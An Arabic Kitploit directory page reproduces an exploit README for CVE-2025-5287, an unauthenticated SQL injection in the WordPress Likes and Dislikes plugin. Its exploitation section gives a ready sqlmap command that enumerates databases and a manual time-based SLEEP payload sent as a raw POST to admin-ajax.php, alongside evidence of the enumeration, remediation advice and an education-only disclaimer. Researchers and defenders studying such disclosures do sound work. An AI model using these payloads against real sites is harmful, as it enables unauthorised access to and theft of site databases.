Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2025-5287
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-5287

CVE-2025-5287

إضافة Likes and Dislikes لووردبريس <= 1.0.0 عرضة لحقن SQL

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 WordPress Likes and Dislikes Plugin ≤ 1.0.0 - حقن SQL بدون مصادقة

🧠 معرّف CVE: CVE-2025-5287

اكتشفها: Khaled_Alenazi (Nxploited)
نُشر في: 27 مايو، 2025


📋 الوصف

إضافة Likes and Dislikes Plugin الخاصة بـ WordPress معرضة لـ حقن SQL عبر المعامل post في جميع الإصدارات حتى 1.0.0 وما يشملها.
بسبب عدم كفاية التهريب وغياب الاستعلامات المعدّة مسبقًا، يمكن للمهاجمين غير المصادقين حقن SQL خام في استعلامات النهاية الخلفية، مما يؤدي إلى تسريب البيانات أو التلاعب بها.


🧬 التفاصيل التقنية

  • المعامل المعرّض للخطر: post
  • نوع الثغرة: SQL Injection (قائم على الاستجابة المنطقية والزمنية)
  • طريقة HTTP: POST
  • المنفذ المتأثر: /wp-admin/admin-ajax.php
  • حالة التصحيح: ❌ غير مُصحَّح
  • الصلاحيات المطلوبة: لا شيء (بدون مصادقة)
  • درجة CVSS: 9.3 (عالية)
  • OWASP Top 10: A1 - حقن

  • 💥 الاستغلال

    ✅ أمر SQLMap (حقن SQL الأعمى القائم على الزمن):

    root@kitploit:~
    sqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
    --data "action=my_likes_dislikes_action&post=1&state=like" \
    --method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
    

    يؤكد هذا الأمر نقطة الحقن ويعدّد قواعد البيانات باستخدام تقنية قائمة على الزمن.

    🧪 حمولة PoC (يدوية - قائمة على الزمن):

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: nxploit.ddev.site
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
    

    🧪 ملخص الأدلة

    1. تعداد SQLMap:

      • تم اكتشاف boolean-based blind و time-based blind SQLi.
      • تم تأكيد أن النهاية الخلفية هي MySQL.
      • تم تعداد قواعد البيانات: db, test, information_schema.

      إثبات SQLMap

    2. التحقق اليدوي باستخدام Burp Suite:

      • تم تأكيد تأخير استجابة HTTP عبر الحمولة الزمنية.
      • تجاوز التأخير 15 seconds، مما يشير إلى حقن حقيقي.

      إثبات Burp Suite


    ⚠️ المخاطر

    • شدة CVSS: 9.3 (عالية)
    • يمكن استخدام هذه الثغرة لاستخراج بيانات حساسة دون مصادقة.

    🔗 المراجع

    • https://patchstack.com/database/wordpress/plugin/inprosysmedia-likes-dislikes-post/vulnerability/wordpress-likes-and-dislikes-plugin-plugin-1-0-0-unauthenticated-sql-injection-vulnerability
    • https://nvd.nist.gov/vuln/detail/CVE-2025-5287

    🛡️ التوصيات

    • قم فورًا بتعقيم وتحويل المدخلات من post إلى معاملات.
    • استخدم الاستعلامات المعدّة مسبقًا.
    • طبّق WAF وتحديد معدل الطلبات (rate-limiting) لتقليل محاولات الحقن بالقوة الغاشمة.

    ⚠️ إخلاء المسؤولية

    هذا المحتوى مُقدَّم لأغراض تعليمية وبحثية فقط.
    لا يُقرّ المؤلف أي نشاط خبيث أو استغلال للأنظمة دون إذن صريح.


    👤 المؤلف

    Khaled_Alenazi (Nxploited)

    تنزيل الأداة